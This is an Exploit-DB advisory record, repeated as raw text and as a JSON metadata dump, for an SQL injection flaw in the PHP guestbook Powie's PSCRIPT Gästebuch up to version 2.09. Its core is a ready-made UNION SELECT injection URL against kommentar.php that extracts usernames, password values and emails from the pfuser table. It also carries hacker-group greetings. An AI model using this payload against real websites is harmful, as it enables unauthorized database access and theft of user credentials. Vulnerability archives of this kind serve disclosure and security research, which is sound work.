ID EDB-ID:11934
Type exploitdb
Reporter Easy Laster
Modified 2010-03-29T00:00:00
Description
Powie's PSCRIPT Gästebuch <= 2.09 - SQL Injection Vulnerability. Webapps exploit for php platform
----------------------------Information------------------------------------------------
+Name : Powie's PSCRIPT Gästebuch <= 2.09 SQL Injection Vulnerability
+Autor : Easy Laster
+Date : 29.03.2010
+Script : Powie's PSCRIPT Gästebuch <= 2.09
+Download : -----------------
+Price : for free version
+Language : PHP
+Discovered by Easy Laster
+Security Group 4004-Security-Project
+Greetz to Team-Internet ,Underground Agents
+And all Friends of Cyberlive : R!p,Eddy14,Silent Vapor,Nolok,
Kiba,-tmh-,Dr.ChAoS,HANN!BAL,Kabel,-=Player=-,Lidloses_Auge,
N00bor,Damian,novaca!ne.
---------------------------------------------------------------------------------------
___ ___ ___ ___ _ _ _____ _ _
| | | | | | |___ ___ ___ ___ _ _ ___|_| |_ _ _ ___| _ |___ ___ |_|___ ___| |_
|_ | | | | |_ |___|_ -| -_| _| | | _| | _| | |___| __| _| . | | | -_| _| _|
|_|___|___| |_| |___|___|___|___|_| |_|_| |_ | |__| |_| |___|_| |___|___|_|
|___| |___|
----------------------------------------------------------------------------------------
+Vulnerability : http://www.site.com/gb/kommentar.php?id=
+Exploitable : http://www.site.com/gb/kommentar.php?id=99999+union+select+1,2,3,4,5
,concat(nickname,0x3a,pwd,0x3a,email),7,8,9,10,11,12,13+from+pfuser+where+id=2
-----------------------------------------------------------------------------------------
{"id": "EDB-ID:11934", "type": "exploitdb", "bulletinFamily": "exploit", "title": "Powie's PSCRIPT G\u00e4stebuch <= 2.09 - SQL Injection Vulnerability", "description": "Powie's PSCRIPT G\u00e4stebuch <= 2.09 - SQL Injection Vulnerability. Webapps exploit for php platform", "published": "2010-03-29T00:00:00", "modified": "2010-03-29T00:00:00", "cvss": {"vector": "NONE", "score": 0.0}, "href": "https://www.exploit-db.com/exploits/11934/", "reporter": "Easy Laster", "references": [], "cvelist": [], "lastseen": "2016-02-01T15:21:54", "viewCount": 7, "enchantments": {"score": {"value": 0.4, "vector": "NONE", "modified": "2016-02-01T15:21:54", "rev": 2}, "dependencies": {"references": [], "modified": "2016-02-01T15:21:54", "rev": 2}, "vulnersScore": 0.4}, "sourceHref": "https://www.exploit-db.com/download/11934/", "sourceData": "----------------------------Information------------------------------------------------\r\n+Name : Powie's PSCRIPT G\u00e4stebuch <= 2.09 SQL Injection Vulnerability\r\n+Autor : Easy Laster\r\n+Date : 29.03.2010\r\n+Script : Powie's PSCRIPT G\u00e4stebuch <= 2.09\r\n+Download : -----------------\r\n+Price : for free version\r\n+Language : PHP\r\n+Discovered by Easy Laster\r\n+Security Group 4004-Security-Project\r\n+Greetz to Team-Internet ,Underground Agents\r\n+And all Friends of Cyberlive : R!p,Eddy14,Silent Vapor,Nolok,\r\nKiba,-tmh-,Dr.ChAoS,HANN!BAL,Kabel,-=Player=-,Lidloses_Auge,\r\nN00bor,Damian,novaca!ne.\r\n\r\n---------------------------------------------------------------------------------------\r\n\r\n ___ ___ ___ ___ _ _ _____ _ _\r\n| | | | | | |___ ___ ___ ___ _ _ ___|_| |_ _ _ ___| _ |___ ___ |_|___ ___| |_\r\n|_ | | | | |_ |___|_ -| -_| _| | | _| | _| | |___| __| _| . | | | -_| _| _|\r\n |_|___|___| |_| |___|___|___|___|_| |_|_| |_ | |__| |_| |___|_| |___|___|_|\r\n |___| |___|\r\n\r\n\r\n----------------------------------------------------------------------------------------\r\n+Vulnerability : http://www.site.com/gb/kommentar.php?id=\r\n\r\n+Exploitable : http://www.site.com/gb/kommentar.php?id=99999+union+select+1,2,3,4,5\r\n,concat(nickname,0x3a,pwd,0x3a,email),7,8,9,10,11,12,13+from+pfuser+where+id=2\r\n\r\n-----------------------------------------------------------------------------------------", "osvdbidlist": []}
{}